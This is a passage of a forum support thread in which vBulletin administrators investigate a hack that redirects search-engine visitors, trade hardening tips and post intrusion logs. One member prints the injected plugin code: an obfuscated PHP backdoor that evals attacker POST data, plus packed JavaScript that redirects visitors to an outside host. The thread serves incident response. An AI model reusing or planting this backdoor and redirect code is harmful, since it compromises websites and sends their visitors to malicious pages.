28Likes
LinkBack URL
About LinkBacks666 is not correct. That may cause problems on systems from REAL files working correctly.
Results 61 to 75 of 235
Google redirecting to filestore123.info
This is a discussion on Google redirecting to filestore123.info within the Troubleshooting forums, part of the vBSEO SEO Plugin category; 666 is not correct. That may cause problems on systems from REAL files working correctly....
-
05-16-2011 12:29 PM #61vBSEO Staff
- Real Name
- Brian Cummiskey
- Join Date
- Jul 2009
- Location
- btwn NYC and Boston
- Posts
- 12,789
- Liked
- 657 times
- Blog Entries
- 2
Brian Cummiskey / Crawlability Inc.
Security vbulletin - Patch Level for all supported versions released!
Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!
-
05-16-2011 02:36 PM #62Senior Member
- Real Name
- Matthias
- Join Date
- Mar 2009
- Posts
- 376
- Liked
- 19 times
In the avatars folder are only images?
What would you recommend?
-
05-16-2011 05:09 PM #63vBSEO Staff
- Real Name
- Brian Cummiskey
- Join Date
- Jul 2009
- Location
- btwn NYC and Boston
- Posts
- 12,789
- Liked
- 657 times
- Blog Entries
- 2
I'm not sure what you're asking...
Brian Cummiskey / Crawlability Inc.
Security vbulletin - Patch Level for all supported versions released!
Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!
-
05-16-2011 07:51 PM #64Junior Member
- Real Name
- MJS
- Join Date
- Oct 2006
- Posts
- 11
- Liked
- 2 times
vbulletin security...
It is possible that your vbulletin admincp is being used/manipulated to run database queries. For example, inserting the redirect code within the datastore table. To make sure that nobody has the ability to run database queries directly from the AdminCP. (Not even admin!) You rarely ever run DB queries from the admincp anyway, so you can blank out everything between the two quotes as shown below within the /includes/config.php file.
from:
to:Code:$config['SpecialUsers']['canrunqueries'] = '1';
cheersCode:$config['SpecialUsers']['canrunqueries'] = '';
-
05-16-2011 09:12 PM #65Member
- Real Name
- alex
- Join Date
- Dec 2009
- Posts
- 60
- Liked
- 1 times
this keeps coming back every few days.
Our hosting company wants to charge about $75 an hour for work on our server so a SUMMARY would help so we do not run up a bill.
Juan, can you help us out?
-
05-16-2011 09:19 PM #66Member
- Real Name
- alex
- Join Date
- Dec 2009
- Posts
- 60
- Liked
- 1 times
ssss delete
-
05-16-2011 09:33 PM #67Member
- Real Name
- alex
- Join Date
- Dec 2009
- Posts
- 60
- Liked
- 1 times
-
05-16-2011 09:57 PM #68vBSEO Staff
- Real Name
- Brian Cummiskey
- Join Date
- Jul 2009
- Location
- btwn NYC and Boston
- Posts
- 12,789
- Liked
- 657 times
- Blog Entries
- 2
A summary has already been posted in this thread.
Google redirecting to filestore123.info - vBulletin SEO ForumsBrian Cummiskey / Crawlability Inc.
Security vbulletin - Patch Level for all supported versions released!
Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!
-
05-17-2011 11:57 PM #69Member
- Real Name
- Marcus Maciel
- Join Date
- Oct 2006
- Location
- Brazil
- Posts
- 78
- Liked
- 2 times
Guys,
I'm having this issue on my website running vBulletin 4.1.1 Patch Level 1 and vbseo 3.6.0
I also was able to find in logs the time the code was added.
Code:192.251.226.205 - - [14/May/2011:13:27:11 -0300] "GET /admincp/ HTTP/1.1" 200 2724 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:27:25 -0300] "POST /login.php?do=login HTTP/1.1" 200 2630 "http://mywebsite.com/admincp/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:27:30 -0300] "GET /admincp/ HTTP/1.1" 200 581 "http://mywebsite.com/login.php?do=login" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:27:31 -0300] "GET /admincp/index.php?do=nav HTTP/1.1" 200 6649 "http://mywebsite.com/admincp/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:27:31 -0300] "GET /admincp/index.php?do=head HTTP/1.1" 200 1731 "http://mywebsite.com/admincp/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:27:32 -0300] "GET /admincp/index.php?do=home HTTP/1.1" 200 5583 "http://mywebsite.com/admincp/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:27:35 -0300] "POST /admincp/newsproxy.php HTTP/1.1" 200 658 "http://mywebsite.com/admincp/index.php?do=home" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:27:36 -0300] "GET /admincp/plugin.php?do=modify HTTP/1.1" 200 10049 "http://mywebsite.com/admincp/index.php?do=nav" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:27:42 -0300] "GET /admincp/plugin.php?do=edit&pluginid=3717 HTTP/1.1" 200 14666 "http://mywebsite.com/admincp/plugin.php?do=modify" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:27:48 -0300] "POST /admincp/plugin.php?do=update HTTP/1.1" 200 1976 "http://mywebsite.com/admincp/plugin.php?do=edit&pluginid=3717" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:27:51 -0300] "GET /admincp/plugin.php HTTP/1.1" 200 10049 "http://mywebsite.com/admincp/plugin.php?do=update" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:28:02 -0300] "GET /admincp/index.php?do=cplogout HTTP/1.1" 302 5 "http://mywebsite.com/admincp/index.php?do=head" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" 192.251.226.205 - - [14/May/2011:13:28:03 -0300] "GET /admincp/index.php HTTP/1.1" 200 2773 "http://mywebsite.com/admincp/index.php?do=head" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
So apparently he got the password of some admin in some way i have no idea this happened
# host 192.251.226.205
205.226.251.192.in-addr.arpa is an alias for rev-205.blutmagie.de.
rev-205.blutmagie.de domain name pointer anonymizer.blutmagie.de.
#
I found the code on datastore also at
mysql -u myuser -pmypass database -e 'select * from vbdatastore where data like "%base64%" limit 1'
I was able to find the code inside vbseo plugin
so in my understand this is not caused by some gif with php code but in someway people are able to get our vbulletin password.... :(Code:if(defined('VBSEO_ENABLED'))^M\nvbseo_complete_sec('global_start');^M\n^M\ eval(CHR(36).CHR(120).CHR(61).CHR(39).@bd393d2ae1db8fbc0be57d642af95eb1.CHR(39).CHR(59).@base64_decode('aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpO3Vuc2V0KCR4KTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywwKTtpbmlfc2V0KCdsb2dfZXJyb3JzJywwKTsNCiRyPSFlbXB0eSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pID8gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddIDogZ2V0ZW52KCdIVFRQX1JFRkVSRVInKTsNCmlmKHN0cmxlbigkcik+MTApDQp7DQoJJGlwPSRfU0VSVkVSWydSRU1PVEVfQUREUiddOyRobj1AZ2V0aG9zdGJ5YWRkcigkaXApOw0KCWlmKChzdHJwb3MoJGlwLCc2NS41NS4nKSE9PTApJiYoc3RycG9zKCRobiwnbXNuYm90Jyk9PT1mYWxzZSkpDQoJew0KCQkkcz1hcnJheSgnc2VhcmNoLmxpdmUuY29tJywnd3d3Lmdvb2dsZScsJ3NlYXJjaC55YWhvby5jb20nLCd3d3cuYmluZy5jb20nLCd5YW5kZXgucnUnLCdiYWlkdS5jb20nKTsNCgkJZm9yZWFjaCgkcyBhcyAkZSkNCgkJew0KCQkJaWYoKHN0cnBvcygkciwkZSkhPT1mYWxzZSkmJihlbXB0eSgkX0NPT0tJRVsndmJzcCddKSkpDQoJCQl7DQoJCQkJJGg9c3RydG91cHBlcihzdWJzdHIoQG1kNSgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLDAsOCkpOw0KCQkJCWRpZSgiPGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiPnZhciB2YnNwPSckaCc7Ii5zdHJfcmVwbGFjZSgnXFwnLCdcXFxcJyxnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnWFZMYmN0b3dGUHdWbXBtT3BMRkR1QmdNY2QxTVFxQk43MDNhdmxocVJ3Z0JEbUFjWXk2SjVYL3ZpaFFtVTl2SFo3VjdMdnNndlpGek9sDQo0bktvK1hDVTFkNlNwMzVtcDN4QW9kSG5uRmlrem42d3pvamJ3ZzVGelRWR1lyZlpQa1ZKMUp4cGhEcVFyVmE4bmVObHNYZDNrV0o1UHFPRg0Kc3VlbE9aOVpZalRaWFQ2TEp6VmMyWHp5cHR0aGtyZzNoTVh4RlN6WFE2bDByVHM5OW43clBPV0xHZHhuTTBucDZ5WWhRQk1CSE9JaVdNc2INCmljaGRIUm56NzRxNkJRbENKNDRmMGdFYjUxU0Jtb3NGNEdMeWJEZ0IzS2lqUk1qellTdmEzYzZrbC9sMUxDaDhTeEN4MkxYREloek4wM2xPDQpXL2xXbEpTVjZSWVhUQ24vaVFLNTV3emUvNThNUTk0YlAvaVV1K0EvV0pqMEdsUURNZVcxcnhFZi9JUDZQeUMzQUtjY21mclBBQVljUS9nTg0KaTN4NGNaWTc1QzRaekhmR0twYXo3QXFMR0Y3K3d2UTlQRHZrUURMUzAxeDBHaDd6MmY0TDNuMy9oM2lObmVnMTF2M1Z6dDk5MURYeURmd28NClFkdE1McENwMXp4QjE2RnJBaGduN2xrYTdkSGl2eXlqUzhxWHlsTEpoR01xb0xRVzJ1SVRQbkJ3dnl5amFVVVVNNGxtMWFOdGdBZVVLRWEwDQpkR0xlSDBuQzFBVzVUQkk1V1JMMXdaZGNSelZSZFZNdm9wbkY4QmNWc2QreEZ6ZlA3VWR0Mk9QelM3ZHN2c2ZBOTVnT2dDMTh5dU1iQzZWLw0KZlVEa3J6R2dyQ2J5SjNFT0JhdHFNUHJvRnMrUjZpYmpZeU8zWTJ6R2lwMWd1ZDVFY0txeG8xRTZkRHBWRHVZL1FWbVA1Unh5Qy9iUTdYRHkNCldZM3F3akxnMnVGYzRvOTlEbXc0VUhSNjJtdVphNUJnSGo3VGF5blRrd25iWlhzNCtwMTh4bXVFcEpkWlhPNDV3U2d4dFljNHVTc2I4JykpKS4iPC9zY3JpcHQ+PC9ib2R5PjwvaHRtbD4iKTsNCgkJCX0NCgkJfQ0KCX0gDQp9'));mjs likes this.
-
05-17-2011 11:59 PM #70Member
- Real Name
- Marcus Maciel
- Join Date
- Oct 2006
- Location
- Brazil
- Posts
- 78
- Liked
- 2 times
Forgot to paste base64 decoded
Code:if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x); ini_set('display_errors',0);ini_set('log_errors',0); $r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER'); if(strlen($r)>10) { $ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip); if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false)) { $s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com'); foreach($s as $e) { if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp']))) { $h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8)); die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl 4nKo+XCU1d6Sp35mp3xAodHnnFikzn6wzojbwg5FzTVGYrfZPkVJ1JxphDqQrVa8neNlsXd3kWJ5PqOF suelOZ9ZYjTZXT6LJzVc2Xzyptthkrg3hMXxFSzXQ6l0rTs99n7rPOWLGdxnM0np6yYhQBMBHOIiWMsb ichdHRnz74q6BQlCJ44f0gEb51SBmosF4GLybDgB3KijRMjzYSva3c6kl/l1LCh8SxCx2LXDIhzN03lO W/lWlJSV6RYXTCn/iQK55wze/58MQ94bP/iUu+A/WJj0GlQDMeW1rxEf/IP6PyC3AKccmfrPAAYcQ/gN i3x4cZY75C4ZzHfGKpaz7AqLGF7+wvQ9PDvkQDLS01x0Gh7z2f4L3n3/h3iNneg11v3Vzt991DXyDfwo QdtMLpCp1zxB16FrAhgn7lka7dHivyyjS8qXylLJhGMqoLQW2uITPnBwvyyjaUUUM4lm1aNtgAeUKEa0 dGLeH0nC1AW5TBI5WRL1wZdcRzVRdVMvopnF8BcVsd+xFzfP7Udt2OPzS7dsvsfA95gOgC18yuMbC6V/ fUDkrzGgrCbyJ3EOBatqMProFs+R6ibjYyO3Y2zGip1gud5EcKqxo1E6dDpVDuY/QVmP5RxyC/bQ7XDy WY3qwjLg2uFc4o99Dmw4UHR62muZa5BgHj7TaynTkwnbZXs4+p18xmuEpJdZXO45wSgxtYc4uSsb8')))."</script></body></html>"); } } } }
-
05-18-2011 12:03 AM #71Member
- Real Name
- Marcus Maciel
- Join Date
- Oct 2006
- Location
- Brazil
- Posts
- 78
- Liked
- 2 times
Javascript content
$ cat test.php
$ php test.phpPHP Code:<?
$var = gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl4nKo+XCU1d6Sp35mp3xAodHnnFikzn6wzojbwg5FzTVGYrfZPkVJ1JxphDqQrVa8neNlsXd3kWJ5PqOF
suelOZ9ZYjTZXT6LJzVc2Xzyptthkrg3hMXxFSzXQ6l0rTs99n7rPOWLGdxnM0np6yYhQBMBHOIiWMsb
ichdHRnz74q6BQlCJ44f0gEb51SBmosF4GLybDgB3KijRMjzYSva3c6kl/l1LCh8SxCx2LXDIhzN03lO
W/lWlJSV6RYXTCn/iQK55wze/58MQ94bP/iUu+A/WJj0GlQDMeW1rxEf/IP6PyC3AKccmfrPAAYcQ/gN
i3x4cZY75C4ZzHfGKpaz7AqLGF7+wvQ9PDvkQDLS01x0Gh7z2f4L3n3/h3iNneg11v3Vzt991DXyDfwo
QdtMLpCp1zxB16FrAhgn7lka7dHivyyjS8qXylLJhGMqoLQW2uITPnBwvyyjaUUUM4lm1aNtgAeUKEa0
dGLeH0nC1AW5TBI5WRL1wZdcRzVRdVMvopnF8BcVsd+xFzfP7Udt2OPzS7dsvsfA95gOgC18yuMbC6V/fUDkrzGgrCbyJ3EOBatqMProFs+R6ibjYyO3Y2zGip1gud5EcKqxo1E6dDpVDuY/QVmP5RxyC/bQ7XDyWY3qwjLg2uFc4o99Dmw4UHR62muZa5BgHj7TaynTkwnbZXs4+p18xmuEpJdZXO45wSgxtYc4uSsb8'));
echo $var;
?>
Code:eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('t a=["\z\b\c\n\e\j\b","\k\b\c\n\e\j\b","\A\x\b\L\f\e\p\b\k\i","\c\d\K\M\n\N\c\p\e\o\z","\q\d\d\J\e\b","\i","\A\x\f\s\c\l\i\g","\D\F\k\f","\G","\r\d\q\s\c\e\d\o","\l\c\c\f\H\g\g\j\P\Q\e\r\b\k\c\d\p\b\B\q\d\j\g\m\d\R\o\r\d\s\m\B\f\l\f\S\e\m\i"];E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};y(a[7],a[8]);v[a[9]]=a[U]+V;',58,58,'||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x76|function|x62|x31|x3A|new|x6B|x47|x78|x4D|x53|Date|x79|x66|x77|x3F|86400000|10|vbsp'.split('|'),0,{}))
-
05-18-2011 01:41 AM #72Junior Member
- Real Name
- MJS
- Join Date
- Oct 2006
- Posts
- 11
- Liked
- 2 times
excellent work magmf!
-
05-19-2011 07:33 AM #73Member
- Real Name
- Joseph Alminawi
- Join Date
- Jun 2009
- Posts
- 60
- Liked
- 0 times
Yeah, this problem came back to me even after following HappyPaints steps...and I'm not certain what action to take. Can anyone advise?
-
05-19-2011 07:38 AM #74Member
- Real Name
- Marcus Maciel
- Join Date
- Oct 2006
- Location
- Brazil
- Posts
- 78
- Liked
- 2 times
my suggestion for now since i dont know how this happen is... change all admins passwords, change admincp directory and add http authentication to the new admincp directory
-
05-19-2011 08:20 AM #75Member
- Real Name
- Joseph Alminawi
- Join Date
- Jun 2009
- Posts
- 60
- Liked
- 0 times
Thanks, I wonder if there is a way to log both the time and ip of admin logins.. I know the IP's are in the admincp... they just aren't time stamped
Reply With QuoteSimilar Threads
-
Redirecting from www.name.com to www.name.com/www
By Trevi in forum TroubleshootingReplies: 2Last Post: 07-22-2009, 08:35 PM -
Update Info for Google Adsense Program
By vBulletin.com Staff in forum vBulletin.com AnnouncementsReplies: 5Last Post: 01-15-2009, 02:50 AM -
Interesting Info about Google Sitemap Stats
By Keith Cohen in forum Analysis: Traffic & SERPSReplies: 1Last Post: 12-30-2005, 12:15 PM
